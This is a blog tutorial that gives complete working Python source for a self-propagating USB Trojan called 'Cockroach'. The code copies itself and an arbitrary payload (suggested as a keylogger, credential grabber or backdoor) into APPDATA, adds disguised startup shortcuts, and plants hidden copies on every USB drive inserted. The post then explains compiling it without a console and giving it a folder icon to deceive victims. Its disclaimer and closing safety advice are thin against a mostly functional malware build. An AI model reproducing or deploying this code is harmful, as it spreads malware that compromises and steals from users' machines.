USB Trojan Tutorial: How to Create, Deploy and Protect Against Malicious USB Attacks

USB Trojan

Introduction

A computer Trojan is a type of malicious software that appears to be harmless, but is actually designed to harm or steal data from a computer system. It is one of the most common forms of malware that cybercriminals use to compromise computer security. A Trojan horse can be disguised as a legitimate software or file, such as a game, video or music file, and can be spread through various methods, including email attachments, malicious websites, and social engineering tactics. One particularly insidious form of Trojan horse is the USB Trojan, which is designed to infect computers through USB devices, such as thumb drives or external hard drives. In this blog post, we will explore the dangers of USB Trojans and how you can code one yourself for educational purposes

This idea is inspired by this github post

Disclamer

The consequences of spreading a USB Trojan can be devastating, and can result in legal action and severe penalties. It is important to take computer security seriously and avoid creating or distributing malware of any kind.

I am not supporting any crime in any direction with this blog post, I am just writing this post to demonstrate to you how easy it is to write trojans like this one.
It is for informational purposes only and reprogramming is at your own risk.

How the USB Trojan works

  • 1. The Trojan gets installed on the victims computer
  • 2. If the pc restarts the Cockroach will run in the background and will look for new usb drives
  • 3.The syware will be activated after a reboot. Now (after a restart) every time any USB-Drive is inserted in the affected PC, the virus will copy itself in that, and will also create a hidden folder called data with the payload.exe in it.
  • 4. The payload.exe can be everything (Keylogger, Credentials Grabber, Backdoor etc.)
  • 5. Now the cycle will start again

If a USB Drive is infected it will look like this. The actual payload is stored in the data folder. If someone opens the ClickMe.exe it will copy itself and the payload into the APPDATA and will add both programms to the startup menu.

How to code the USB Trojan

At first we need to import some methods:

import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import os

Now we can create a method which checks for new USB Drives:

def get_removable_drives():
    drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
    rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
    return rdrives

After this we will need to check if the computer is already infected

If a Pc is already infected it has the folder WindowsRuntime and the file win_logs.txt in the APPDATA Directory, so we have to check if the directory and the file exist. But before we need to take a look if we are running our Cockroach of a USB Drive or if we are running it in the APPDATA Directory after a Pc startup.

For this we create the following function:

isOnUSB = False
def checkIfIsOnUSB():
    global isOnUSB
    executePath = sys.executable
    #executePath = "E:\Cockroach Python\dist\cockroach.exe"
    x = executePath.split("\\")
    currentDir = x[0]+"\\" 
    drives = get_removable_drives()
    for d in drives:
        if(d==currentDir):
             isOnUSB=True

Now we can check if the computer is already infected with our trojan:

#Define the names of the payload and trojan
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME

COCKROACHNAME = "ClickMe.exe"
def checkInfection():
    global PAYLOADNAME
    global COCKROACHNAME
    APPDATA = os.getenv('APPDATA') + "\\"
    if(isOnUSB):
        #Cockroach is on USB
        #Check if the file win_log exists in the APPDATA Folder
        filePath = APPDATA + "win_log.txt"
        if not os.path.isfile(filePath):
            #Infect the pc
            directory = APPDATA + "WindowsRuntime"
            #Create WindowsRuntime Folder
            if not os.path.exists(directory):
                os.makedirs(directory)
            #Paste directory of it into it
            #Paste payload and cockroach into it
            shutil.copy(PAYLOADSRC, directory)
            #Paste cockroach into it
            shutil.copy(COCKROACHNAME, directory)
            #Write to file for infection
            f = open(filePath, "w")
            f.write("g")
            f.close()
            #Add Payload to start and ClickMe also
            addToStartUp()
            sys.exit("")
    else:
        #Check for incoming usb sticks
        drives = get_removable_drives()
        while True:
            drives = get_removable_drives()
            for d in drives:
                if not os.path.exists(d+"\data"):
                    #infect machine
                    os.makedirs(d+"\data")
                    FILE_ATTRIBUTE_HIDDEN = 0x02
                    ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
                    #Copy payload into it
                    src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
                    shutil.copy(src, d+"\data")
                    src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
                    shutil.copy(src, d)
            time.sleep(10)

This function checks if the programm is running of a USB Drive. If so it is checking if the computer is already infected and if not it will paste itself into the APPDATA Directory and will create a new folder called WindowsRuntime there.

If the computer is already infected it will just close itself.

If we are not running the programm of a USB Device, we know that the trojan is already installed and that the programm got started at startup. Now we can check for new USB Devices and can infect them.

It will wait 10 seconds after it checked and infected the USB Devices.

Thats all. Now we just have to add all these pieces of code together and we have a running script which will look like this:

import win32api
import win32con
import win32file
import shutil
import sys
import ctypes
import time
import getpass
import win32com.client
import pythoncom
import os
isOnUSB = False
PAYLOADNAME = "payload.exe"
PAYLOADSRC = "data\\"+PAYLOADNAME

COCKROACHNAME = "ClickMe.exe"
def checkInfection():
    global PAYLOADNAME
    global COCKROACHNAME
    APPDATA = os.getenv('APPDATA') + "\\"
    if(isOnUSB):
        #Cockroach is on USB
        filePath = APPDATA + "win_log.txt"
        if not os.path.isfile(filePath):
            #Infected the pc
            directory = APPDATA + "WindowsRuntime"
            #Create WindowsRuntime Folder
            if not os.path.exists(directory):
                os.makedirs(directory)
            #Paste directory of it into it
            #Paste payload and cockroach into it
            shutil.copy(PAYLOADSRC, directory)
            #Paste cockroach into it
            shutil.copy(COCKROACHNAME, directory)
            #Write to file for infection
            f = open(filePath, "w")
            f.write("g")
            f.close()
            #Add Payload to start and ClickMe also
            addToStartUp()
            sys.exit("")
    else:
        #Check for incoming usb sticks
        drives = get_removable_drives()
        while True:
            drives = get_removable_drives()
            for d in drives:
                if not os.path.exists(d+"\data"):
                    #infect machine
                    os.makedirs(d+"\data")
                    FILE_ATTRIBUTE_HIDDEN = 0x02
                    ret = ctypes.windll.kernel32.SetFileAttributesW(d+"\data", FILE_ATTRIBUTE_HIDDEN)
                    #Copy payload into it
                    src = APPDATA + "WindowsRuntime\\"+PAYLOADNAME
                    shutil.copy(src, d+"\data")
                    src = APPDATA + "WindowsRuntime\\"+COCKROACHNAME
                    shutil.copy(src, d)
            time.sleep(3)


def addToStartUp():
    global PAYLOADNAME
    APPDATA = os.getenv('APPDATA')
    paySRC = APPDATA+"\\WindowsRuntime\\"+PAYLOADNAME
    roachSRC = APPDATA+"\\WindowsRuntime\\"+COCKROACHNAME
    startupSource = APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
    #For Payload.exe
    path = os.path.join(startupSource, 'WindowsRuntimeException.lnk')
    target = paySRC
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(path)
    shortcut.Targetpath = target
    shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
    shortcut.save()
    #For ClickMe
    path = os.path.join(startupSource, 'WindowsRuntime.lnk')
    target = roachSRC
    shell = win32com.client.Dispatch("WScript.Shell")
    shortcut = shell.CreateShortCut(path)
    shortcut.Targetpath = target
    shortcut.WindowStyle = 7 # 7 - Minimized, 3 - Maximized, 1 - Normal
    shortcut.save()


def get_removable_drives():
    drives = [i for i in win32api.GetLogicalDriveStrings().split('\x00') if i]
    rdrives = [d for d in drives if win32file.GetDriveType(d) == win32con.DRIVE_REMOVABLE]
    return rdrives
def checkIfIsOnUSB():
    global isOnUSB
    executePath = sys.executable
    #executePath = "E:\Cockroach Python\dist\cockroach.exe"
    x = executePath.split("\\")
    currentDir = x[0]+"\\" 
    drives = get_removable_drives()
    for d in drives:
        if(d==currentDir):
             isOnUSB=True

if __name__ == "__main__":
    checkIfIsOnUSB()
    checkInfection()

Convert it to exe

In order to convert it into a running programm we will install pyinstaller with the command:

pip install pyinstaller

Now we can run:

pyinstaller --onefile --noconsole --icon=icon.ico <name>.py

I wanted to add a folder icon to the exe, so that our victim thinks it is a folder so I downloaded a folder png like this and converted it into a ico file.

You will now find these to folders in your project, but the only important one is the dist folder. Now rename the .exe file like the COCKROACHNAME variable in your python file

Injecting the payload

Now we need to add the actual payload into our Cockroach. For this we create a new folder called data in the dist folder. Now you can move your payload into the data folder (it has to be the same name like the PAYLOADNAME variable in python).

Test it out

Now move the data folder and the ClickMe.exe onto a USB Drive and run the ClickMe.exe file. The pc is now injected and will copy the payload and our USB Cockroach to all incoming USB Devices.

Conclusion

So what are we learning with this project?

USB sticks can be very dangerous and it is very easy to write Trojans like these, which most users do not even notice.
Therefore, always remember not to insert foreign USB sticks into your computer and especially not to open foreign files that you are unsure about.
Also, remember that your antivirus programs do not protect you from all programs like this one, and always be careful what you run on your PC.

If you are interested in more coding tutorials check out our coding category of our blog.

1 thought on “USB Trojan Tutorial: How to Create, Deploy and Protect Against Malicious USB Attacks”

Leave a Comment

Your email address will not be published. Required fields are marked *